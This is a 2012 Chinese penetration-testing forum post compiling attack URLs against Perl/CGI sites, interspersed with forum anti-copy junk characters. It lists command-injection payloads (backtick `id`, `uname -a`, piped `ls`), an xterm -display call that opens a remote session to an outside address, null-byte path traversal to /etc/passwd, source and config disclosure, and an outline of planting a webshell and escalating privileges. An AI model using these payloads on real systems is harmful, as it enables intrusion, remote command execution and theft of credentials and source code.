中国网络渗透测试联盟

标题: CGI资料整理 [打印本页]

作者: admin    时间: 2012-9-13 16:56
标题: CGI资料整理
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  * g% g9 E7 {7 c% T/ J
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  / A% t9 c" [% o: D
感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  
( ]7 }, i1 I) f注“  0 x) w8 ~2 E6 L9 Q+ ?! U
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  6 I1 y" g$ a/ U0 b
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  
1 `' ^. |* t  o' W7 T* A2 H2 h: Y1 j8 J2 Q
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  ; [+ r0 X+ q4 I4 i3 L% A6 [& ^. d
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  $ Y9 [1 M3 E! S/ Q. d
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  9 b9 V( B0 j3 w! j( k
http://target.com/cgi-bin/home/news/sub.pl?`id`  + M' w3 _' x- I
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  
! u; b" |, `( L- |http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示    u* q; [: F$ @5 g( C! Q
1 g6 Z  Y& }) ?
http://target.com/test.pl;ls|  $ Y0 `: j8 ^9 _$ v5 }# ]. L- g
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  - \( x. \0 o4 N, C
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  % V  _& V; _+ H# {6 z+ R
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  & p$ @0 l( r  h" ^4 V, I
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  5 L) z! E" g: b6 O5 c
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  ! J$ x: {- d* s, n7 `

$ s# c# A+ R6 c+ u# I9 Fhttp://target.com/test.pl?&........ /../../etc/passwd  
# {4 P& g& L) a0 v2 N0 V/ e8 ?0 {0 S5 q
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  $ P, d) ~* Q* a+ ~) Z9 g
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  
/ i1 S' X3 R* p- v* O$ p: r* e. \http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  
" x) B8 ]: V1 r* u& {# p
' K8 Q" \2 G# hhttp://www.target.org/show.php?f ... /include/config.php 查看php代码  0 ]4 L' p' T6 n. k' E  }/ i
http://www.target.org/show.php?f ... ng/admin/global.php  : n, ~, P" {5 [
. L8 t+ y! V* d, l& i
emm和ps的一句话" I( S/ }2 L6 J, y
  t6 e* Q$ Z7 l7 C1 e- x8 c3 O
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  8 K. K: ?7 p& G# N: n
1 Z8 P$ `* Z) B% m  n8 E2 S
>bbb%20|  ! E& s+ {5 q9 G0 ?( s& l
+ [+ E' D6 A) E8 z
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  3 l! v, M' y3 V, S8 r0 R
/ h' i" u; R  X  y& S
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  / K  c7 u! [" a) y" S( v# {
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
+ E7 m6 r. n1 U/ e3 c! v* T- v, m6 O! E9 X0 E3 m
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  4 a4 P$ j2 N& n( \; @
http://target.com/index.html#cmd.exe  $ Q. J+ Y4 E. A* [5 m
http://target.com/index.html?dummyparam=xp_cmdshell  1 h* a, \6 j! c8 y8 v
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  
% c+ }3 J4 o) e( T) u3 e




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2